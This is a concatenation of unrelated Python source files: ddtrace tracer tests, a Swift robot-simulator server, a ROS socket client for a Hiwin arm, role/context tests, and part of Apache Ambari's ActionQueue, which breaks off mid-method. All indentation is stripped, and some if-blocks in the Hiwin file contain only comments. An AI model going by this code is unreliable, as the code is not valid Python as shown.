t.trace("child").finish()
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("X-Datadog-Trace-Count") == "10"
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support priority sampling responses.")
def test_priority_sampling_response():
# Send the data once because the agent doesn't respond with them on the
# first payload.
t = Tracer()
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
assert "service:my-svc,env:my-env" not in t.writer._priority_sampler._by_service_samplers
t.shutdown()
# For some reason the agent doesn't start returning the service information
# immediately
import time
time.sleep(5)
t = Tracer()
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
assert "service:my-svc,env:my-env" not in t.writer._priority_sampler._by_service_samplers
t.shutdown()
assert "service:my-svc,env:my-env" in t.writer._priority_sampler._by_service_samplers
def test_bad_endpoint():
t = Tracer()
t.writer._endpoint = "/bad"
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
t.shutdown()
calls = [mock.call("unsupported endpoint '%s': received response %s from Datadog Agent", "/bad", 404)]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="FIXME: Test agent response is different.")
def test_bad_payload():
t = Tracer()
class BadEncoder:
def encode_trace(self, spans):
return []
def join_encoded(self, traces):
return "not msgpack"
t.writer._encoder = BadEncoder()
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("asdf").finish()
t.shutdown()
calls = [
mock.call(
"failed to send traces to Datadog Agent at %s: HTTP error status %s, reason %s",
"http://localhost:8126",
400,
"Bad Request",
)
]
log.error.assert_has_calls(calls)
def test_bad_encoder():
t = Tracer()
class BadEncoder:
def encode_trace(self, spans):
raise Exception()
def join_encoded(self, traces):
pass
t.writer._encoder = BadEncoder()
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("asdf").finish()
t.shutdown()
calls = [mock.call("failed to encode trace with encoder %r", t.writer._encoder, exc_info=True)]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support v0.3")
def test_downgrade():
t = Tracer()
t.writer._downgrade(None, None)
assert t.writer._endpoint == "/v0.3/traces"
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_span_tags():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.set_metric("number", 123)
s.set_metric("number", 12.0)
s.set_metric("number", "1")
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
@pytest.mark.skipif(AGENT_VERSION != "testagent", reason="Tests only compatible with a testagent")
class TestTraces(TracerTestCase):
"""
These snapshot tests ensure that trace payloads are being sent as expected.
"""
@snapshot(include_tracer=True)
def test_single_trace_single_span(self, tracer):
s = tracer.trace("operation", service="my-svc")
s.set_tag("k", "v")
# numeric tag
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
s.finish()
tracer.shutdown()
@snapshot(include_tracer=True)
def test_multiple_traces(self, tracer):
with tracer.trace("operation1", service="my-svc") as s:
s.set_tag("k", "v")
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
tracer.trace("child").finish()
with tracer.trace("operation2", service="my-svc") as s:
s.set_tag("k", "v")
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
tracer.trace("child").finish()
tracer.shutdown()
@snapshot(include_tracer=True)
def test_filters(self, tracer):
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
tracer.shutdown()
@snapshot(include_tracer=True)
def test_sampling(self, tracer):
with tracer.trace("trace1"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=1.0)
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace2"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=0.000001)
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace3"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=1, rules=[SamplingRule(1.0)])
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace4"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=1, rules=[SamplingRule(0)])
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace5"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=1)
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace6"):
with tracer.trace("child") as span:
span.set_tag(MANUAL_DROP_KEY)
sampler = DatadogSampler(default_sample_rate=1)
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace7"):
with tracer.trace("child") as span:
span.set_tag(MANUAL_KEEP_KEY)
sampler = RateSampler(0.0000000001)
tracer.configure(sampler=sampler, writer=tracer.writer)
# This trace should not appear in the snapshot
with tracer.trace("trace8"):
with tracer.trace("child"):
pass
tracer.shutdown()
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support empty trace payloads.")
def test_flush_log(caplog):
caplog.set_level(logging.INFO)
writer = AgentWriter()
with mock.patch("ddtrace.internal.writer.log") as log:
writer.write([])
writer.flush_queue(raise_exc=True)
calls = [mock.call(logging.DEBUG, "sent %s in %.5fs", AnyStr(), AnyFloat())]
log.log.assert_has_calls(calls)
|
SwiftRoute.py
|
#!/usr/bin/env python
"""
@author Jesse Haviland
"""
import swift as sw
import websockets
import asyncio
from threading import Thread
import webbrowser as wb
import json
import http.server
import socketserver
from pathlib import Path
import os
from queue import Empty
import numpy as np
import time
import sys
def start_servers(
outq, inq, stop_servers, open_tab=True,
browser=None, dev=False):
# Start our websocket server with a new clean port
socket = Thread(
target=SwiftSocket, args=(outq, inq, stop_servers, ), daemon=True)
socket.start()
socket_port = inq.get()
if not dev:
# Start a http server
server = Thread(
target=SwiftServer,
args=(outq, inq, socket_port, stop_servers, ),
daemon=True)
server.start()
server_port = inq.get()
if open_tab:
if browser is not None:
try:
wb.get(browser).open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
except wb.Error:
print(
'\nCould not open specified browser, '
'using default instead\n')
wb.open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
else:
wb.open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
else:
server = None
wb.get(browser).open_new_tab(
'http://localhost:'
+ str(3000)
+ '/?'
+ str(socket_port))
try:
inq.get(timeout=10)
except Empty:
print('\nCould not connect to the Swift simulator \n')
raise
return socket, server
class SwiftSocket:
def __init__(self, outq, inq, run):
self.run = run
self.outq = outq
self.inq = inq
self.USERS = set()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
started = False
# port = 8080
# start_server = websockets.serve(self.serve, "localhost", port)
# self.loop.run_until_complete(start_server)
port = 53000
while not started and port < 62000:
try:
start_server = websockets.serve(self.serve, "localhost", port)
self.loop.run_until_complete(start_server)
started = True
except OSError:
port += 1
self.inq.put(port)
self.loop.run_forever()
async def register(self, websocket):
self.USERS.add(websocket)
async def serve(self, websocket, path):
# Initial connection handshake
await(self.register(websocket))
recieved = await websocket.recv()
self.inq.put(recieved)
# Now onto send, recieve cycle
while self.run():
message = await self.producer()
expected = message[0]
msg = message[1]
await websocket.send(json.dumps(msg))
if expected:
recieved = await websocket.recv()
self.inq.put(recieved)
return
async def producer(self):
data = self.outq.get()
return data
class SwiftServer:
def __init__(
self, outq, inq, socket_port, run,
verbose=False, custom_root=None):
server_port = 52000
self.inq = inq
self.run = run
root_dir = Path(sw.__file__).parent / 'out'
# os.chdir(Path.home())
# os.chdir(Path.home().anchor)
os.chdir(root_dir.anchor)
print(root_dir)
class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
if verbose:
http.server.SimpleHTTPRequestHandler.log_message(
self, format, *args)
else:
pass
def do_POST(self):
print(self)
def do_GET(self):
home = str(Path.home())
if self.path == '/':
self.send_response(301)
self.send_header(
'Location', 'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
self.end_headers()
return
if self.path == '/?' + str(socket_port):
self.path = str(root_dir / 'index.html')
elif self.path.endswith('svg') or self.path.endswith('ico'):
self.path = str(root_dir) + str(Path(self.path))
elif self.path.endswith('css') or self.path.endswith('js') \
or self.path.endswith('map'):
self.path = str(root_dir) + str(Path(self.path))
self.path = str(Path(self.path))
# if self.path.lower().startswith(home.lower()):
# self.path = self.path[len(home):]
# elif self.path.lower().startswith(home.lower()[2:]):
# self.path = self.path[len(home)-2:]
self.path = Path(self.path).as_posix()
return http.server.SimpleHTTPRequestHandler.do_GET(self)
Handler = MyHttpRequestHandler
connected = False
while not connected and server_port < 62000:
try:
with socketserver.TCPServer(
("", server_port), Handler) as httpd:
self.inq.put(server_port)
connected = True
# while self.run():
# httpd.handle_request
httpd.serve_forever()
except OSError:
server_port += 1
|
Hiwin_RT605_ArmCommand_Socket_20190627161324.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
# client_response = 0 #回傳次數初始值
# point_data_flag = False
# arm_mode_flag = False
# speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def _init_(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(False,False)
# def socket_client_arm_state(Arm_state):
# global state_feedback
# rospy.wait_for_service('arm_state')
# try:
# Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
# state_feedback = Arm_state_client(Arm_state)
# #pos_feedback_times = pos_feedback.response
# return state_feedback
# except rospy.ServiceException as e:
# print ("Service call failed: %s"%e)
# ##----------socket sent data flag-------------
# def socket_client_sent_flag(Sent_flag):
# global sent_feedback
# rospy.wait_for_service('sent_flag')
# try:
# Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
# sent_feedback = Sent_flag_client(Sent_flag)
# #pos_feedback_times = pos_feedback.response
# return sent_feedback
# except rospy.ServiceException as e:
# print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
point_data_flag = True
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
speed_mode_flag = True
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = False
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
|
test_context.py
|
from typing import List, Protocol
from roles import RoleType
from roles.context import context, in_context
class Account(Protocol):
balance: float
def withdraw(self, amount: float) -> None:
...
def deposit(self, amount: float) -> None:
...
class PaymentAccount:
def __init__(self, amount):
print("Creating a new account with balance of " + str(amount))
self.balance = amount
def withdraw(self, amount):
print("Withdraw " + str(amount) + " from " + str(self))
self.balance -= amount
def deposit(self, amount):
print("Deposit " + str(amount) + " in " + str(self))
self.balance += amount
class MoneySource(metaclass=RoleType):
def transfer(self: Account, amount):
if self.balance >= amount:
self.withdraw(amount)
context.to_account.receive(amount)
class MoneySink(metaclass=RoleType):
def receive(self: Account, amount):
self.deposit(amount)
class TransferMoney:
def __init__(self, from_account: Account, to_account: Account):
self.from_account = MoneySource(from_account) # type: ignore[call-arg]
self.to_account = MoneySink(to_account) # type: ignore[call-arg]
def transfer_money__with(self, amount):
"""The interaction."""
with context(self):
assert isinstance(self.from_account, PaymentAccount)
self.from_account.transfer(amount)
@in_context
def transfer_money__decorator(self, amount):
"""The interaction."""
assert isinstance(self.from_account, PaymentAccount)
self.from_account.transfer(amount)
def test_context_context_manager_style():
src = PaymentAccount(1000)
dst = PaymentAccount(0)
tm = TransferMoney(src, dst)
tm.transfer_money__with(100)
print(src, src.balance)
assert src.balance == 900
print(dst, dst.balance)
assert dst.balance == 100
def test_context_decorator():
src = PaymentAccount(1000)
dst = PaymentAccount(0)
tm = TransferMoney(src, dst)
tm.transfer_money__decorator(100)
print(src, src.balance)
assert src.balance == 900
print(dst, dst.balance)
assert dst.balance == 100
def test_context_set_values():
class Test:
@in_context
def test(self):
context.foo = 1
assert context.current_context.foo == 1
Test().test()
def test_context_manager_multi_threading():
import threading
class ContextClass:
stack: List[object]
def doit(self):
with context(self):
# Save stack to ensure it's different
context.stack = context.__dict__.get("__stack")
cc1 = ContextClass()
cc2 = ContextClass()
thread = threading.Thread(target=cc2.doit)
thread.start()
cc1.doit()
thread.join()
# ensure both stacks are different objects
assert cc1.stack is not cc2.stack, "%d != %d" % (id(cc1.stack), id(cc2.stack))
def test_context_manager_multi_threading_nesting():
import threading
import time
class ContextClass:
depth: int
def doit(self, level=100):
if level == 0:
context.depth = len(context.__dict__["__stack"])
else:
with context(self):
print((context.__dict__["__stack"]), level)
self.doit(level - 1)
time.sleep(0.001)
cc1 = ContextClass()
cc2 = ContextClass()
thread = threading.Thread(target=cc2.doit)
thread.start()
cc1.doit()
thread.join()
# ensure both stacks are different objects
assert cc1.depth == 100, cc1.depth
assert cc2.depth == 100, cc2.depth
|
main.py
|
#!/bin/python3
import threading
import os
from http_server import run_http_server
if __name__ == "__main__":
PORT = int(os.environ.get('PORT', '8080'))
HTTP_THREAD = threading.Thread(target=run_http_server, args=(PORT,))
HTTP_THREAD.daemon = True
HTTP_THREAD.start()
threading.Event().wait()
|
ActionQueue.py
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import Queue
import logging
import threading
import pprint
import os
import ambari_simplejson as json
import time
import signal
from AgentException import AgentException
from ambari_agent.BackgroundCommandExecutionHandle import BackgroundCommandExecutionHandle
from ambari_agent.models.commands import AgentCommand, CommandStatus
from ambari_commons.str_utils import split_on_chunks
logger = logging.getLogger()
installScriptHash = -1
MAX_SYMBOLS_PER_LOG_MESSAGE = 7900
class ActionQueue(threading.Thread):
""" Action Queue for the agent. We pick one command at a time from the queue
and execute it
Note: Action and command terms in this and related classes are used interchangeably
"""
# How many actions can be performed in parallel. Feel free to change
MAX_CONCURRENT_ACTIONS = 5
# How much time(in seconds) we need wait for new incoming execution command before checking status command queue
EXECUTION_COMMAND_WAIT_TIME = 2
def __init__(self, initializer_module):
super(ActionQueue, self).__init__()
self.commandQueue = Queue.Queue()
self.backgroundCommandQueue = Queue.Queue()
self.commandStatuses = initializer_module.commandStatuses
self.config = initializer_module.config
self.recovery_manager = initializer_module.recovery_manager
self.configTags = {}
self.stop_event = initializer_module.stop_event
self.tmpdir = self.config.get('agent', 'prefix')
self.customServiceOrchestrator = initializer_module.customServiceOrchestrator
self.parallel_execution = self.config.get_parallel_exec_option()
self.taskIdsToCancel = set()
self.cancelEvent = threading.Event()
self.component_status_executor = initializer_module.component_status_executor
if self.parallel_execution == 1:
logger.info("Parallel execution is enabled, will execute agent commands in parallel")
self.lock = threading.Lock()
def put(self, commands):
for command in commands:
if "serviceName" not in command:
command["serviceName"] = "null"
if "clusterId" not in command:
command["clusterId"] = "null"
logger.info("Adding {commandType} for role {role} for service {serviceName} of cluster_id {clusterId} to the queue".format(**command))
if command['commandType'] == AgentCommand.background_execution:
self.backgroundCommandQueue.put(self.create_command_handle(command))
else:
self.commandQueue.put(command)
def interrupt(self):
self.commandQueue.put(None)
def cancel(self, commands):
for command in commands:
logger.info("Canceling command with taskId = {tid}".format(tid = str(command['target_task_id'])))
if logger.isEnabledFor(logging.DEBUG):
logger.debug(pprint.pformat(command))
task_id = command['target_task_id']
reason = command['reason']
# Remove from the command queue by task_id
queue = self.commandQueue
self.commandQueue = Queue.Queue()
while not queue.empty():
queued_command = queue.get(False)
if queued_command['taskId'] != task_id:
self.commandQueue.put(queued_command)
else:
logger.info("Canceling {commandType} for service {serviceName} and role {role} with taskId {taskId}".format(
**queued_command
))
# Kill if in progress
self.customServiceOrchestrator.cancel_command(task_id, reason)
self.taskIdsToCancel.add(task_id)
self.cancelEvent.set()
def run(self):
while not self.stop_event.is_set():
try:
self.process_background_queue_safe_empty()
self.fill_recovery_commands()
try:
if self.parallel_execution == 0:
command = self.commandQueue.get(True, self.EXECUTION_COMMAND_WAIT_TIME)
if command is None:
break
self.process_command(command)
else:
# If parallel execution is enabled, just kick off all available
# commands using separate threads
while not self.stop_event.is_set():
command = self.commandQueue.get(True, self.EXECUTION_COMMAND_WAIT_TIME)
if command is None:
break
# If command is not retry_enabled then do not start them in parallel
# checking just one command is enough as all commands for a stage is sent
# at the same time and retry is only enabled for initial start/install
retry_able = False
if 'commandParams' in command and 'command_retry_enabled' in command['commandParams']:
retry_able = command['commandParams']['command_retry_enabled'] == "true"
if retry_able:
logger.info("Kicking off a thread for the command, id={} taskId={}".format(command['commandId'], command['taskId']))
t = threading.Thread(target=self.process_command, args=(command,))
t.daemon = True
t.start()
else:
self.process_command(command)
break
pass
pass
except Queue.Empty:
pass
except Exception:
logger.exception("ActionQueue thread failed with exception. Re-running it")
logger.info("ActionQueue thread has successfully finished")
def fill_recovery_commands(self):
if self.recovery_manager.enabled() and not self.tasks_in_progress_or_pending():
self.put(self.recovery_manager.get_recovery_commands())
def process_background_queue_safe_empty(self):
while not self.backgroundCommandQueue.empty():
try:
command = self.backgroundCommandQueue.get(False)
if "__handle" in command and command["__handle"].status is None:
self.process_command(command)
except Queue.Empty:
pass
def create_command_handle(self, command):
if "__handle" in command:
raise AgentException("Command already has __handle")
command['__handle'] = BackgroundCommandExecutionHandle(command, command['commandId'], None, self.on_background_command_complete_callback)
return command
def process_command(self, command):
# make sure we log failures
command_type = command['commandType']
logger.debug("Took an element of Queue (command type = %s).", command_type)
try:
if command_type in AgentCommand.AUTO_EXECUTION_COMMAND_GROUP:
try:
if self.recovery_manager.enabled():
self.recovery_manager.on_execution_command_start()
self.recovery_manager.process_execution_command(command)
self.execute_command(command)
finally:
if self.recovery_manager.enabled():
self.recovery_manager.on_execution_command_finish()
else:
logger.error("Unrecognized command %s", pprint.pformat(command))
except Exception:
logger.exception("Exception while processing {0} command".format(command_type))
def tasks_in_progress_or_pending(self):
return not self.commandQueue.empty() or self.recovery_manager.has_active_command()
def execute_command(self, command):
"""
Executes commands of type EXECUTION_COMMAND
"""
cluster_id = command['clusterId']
command_id = command['commandId']
command_type = command['commandType']
num_attempts = 0
retry_duration = 0 # even with 0 allow one attempt
retry_able = False
delay = 1
log_command_output = True
command_canceled = False
command_result = {}
message = "Executing command with id = {commandId}, taskId = {taskId} for role = {role} of " \
"cluster_id {cluster}.".format(commandId=str(command_id), taskId=str(command['taskId']),
role=command['role'], cluster=cluster_id)
logger.info(message)
taskId = command['taskId']
# Preparing 'IN_PROGRESS' report
in_progress_status = self.commandStatuses.generate_report_template(command)
# The path of the files that contain the output log and error log use a prefix that the agent advertises to the
# server. The prefix is defined in agent-config.ini
if command_type != AgentCommand.auto_execution:
in_progress_status.update({
'tmpout': self.tmpdir + os.sep + 'output-' + str(taskId) + '.txt',
'tmperr': self.tmpdir + os.sep + 'errors-' + str(taskId) + '.txt',
'structuredOut': self.tmpdir + os.sep + 'structured-out-' + str(taskId) + '.json',
'status': CommandStatus.in_progress
})
else:
in_progress_status.update({
'tmpout': self.tmpdir + os.sep + 'auto_output-' + str(taskId) + '.txt',
'tmperr': self.tmpdir + os.sep + 'auto_errors-' + str(taskId) + '.txt',
'structuredOut': self.tmpdir + os.sep + 'auto_structured-out-' + str(taskId) + '.json',
'status': CommandStatus.in_progress
})
self.commandStatuses.put_command_status(command, in_progress_status)
if 'commandParams' in command:
if 'max_duration_for_retries' in command['commandParams']:
retry_duration = int(command['commandParams']['max_duration_for_retries'])
if 'command_retry_enabled' in command['commandParams'] and command_type != AgentCommand.auto_execution:
# for AgentCommand.auto_execution command retry_able should be always false
retry_able = command['commandParams']['command_retry_enabled'] == "true"
if 'log_output' in command['commandParams']:
log_command_output = command['commandParams']['log_output'] != "false"
logger.info("Command execution metadata - taskId = {taskId}, retry enabled = {retryAble}, max retry duration (sec)"
" = {retryDuration}, log_output = {log_command_output}".format(
taskId=taskId, retryAble=retry_able, retryDuration=retry_duration, log_command_output=log_command_output))
self.cancelEvent.clear()
# for case of command reschedule (e.g. command and cancel for the same taskId are send at the same time)
self.taskIdsToCancel.discard(taskId)
while retry_duration >= 0:
if taskId in self.taskIdsToCancel:
logger.info('Command with taskId = {0} canceled'.format(taskId))
command_canceled = True
self.taskIdsToCancel.discard(taskId)
break
num_attempts += 1
start = 0
if retry_able:
start = int(time.time())
# running command
command_result = self.customServiceOrchestrator.runCommand(command,
in_progress_status['tmpout'],
in_progress_status['tmperr'],
override_output_files=num_attempts == 1,
retry=num_attempts > 1)
end = 1
if retry_able:
end = int(time.time())
retry_duration -= (end - start)
# dumping results
if command_type == AgentCommand.background_execution:
logger.info("Command is background command, quit retrying. Exit code: {exitCode}, retryAble: {retryAble}, retryDuration (sec): {retryDuration}, last delay (sec): {delay}"
.format(cid=taskId, exitCode=command_result['exitcode'], retryAble=retry_able, retryDuration=retry_duration, delay=delay))
return
else:
if command_result['exitcode'] == 0:
status = CommandStatus.completed
else:
status = CommandStatus.failed
if (command_result['exitcode'] == -signal.SIGTERM) or (command_result['exitcode'] == -signal.SIGKILL):
logger.info('Command with taskId = {cid} was canceled!'.format(cid=taskId))
command_canceled = True
self.taskIdsToCancel.discard(taskId)
break
if status != CommandStatus.completed and retry_able and retry_duration > 0:
delay = self.get_retry_delay(delay)
if delay > retry_duration:
delay = retry_duration
retry_duration -= delay # allow one last attempt
command_result['stderr'] += "\n\nCommand failed. Retrying command execution ...\n\n"
logger.info("Retrying command with taskId = {cid} after a wait of {delay}".format(cid=taskId, delay=delay))
if 'agentLevelParams' not in command:
command['agentLevelParams'] = {}
command['agentLevelParams']['commandBeingRetried'] = "true"
self.cancelEvent.wait(delay) # wake up if something was canceled
continue
else:
logger.info("Quit retrying for command with taskId = {cid}. Status: {status}, retryAble: {retryAble}, retryDuration (sec): {retryDuration}, last delay (sec): {delay}"
.format(cid=taskId, status=status, retryAble=retry_able, retryDuration=retry_duration, delay=delay))
break
self.taskIdsToCancel.discard(taskId)
# do not fail task which was rescheduled from server
if command_canceled:
with self.lock, self.commandQueue.mutex:
for com in self.commandQueue.queue:
if com['taskId'] == command['taskId']:
logger.info("Command with taskId = {cid} was rescheduled by server. "
"Fail report on cancelled command won't be sent with heartbeat.".format(cid=taskId))
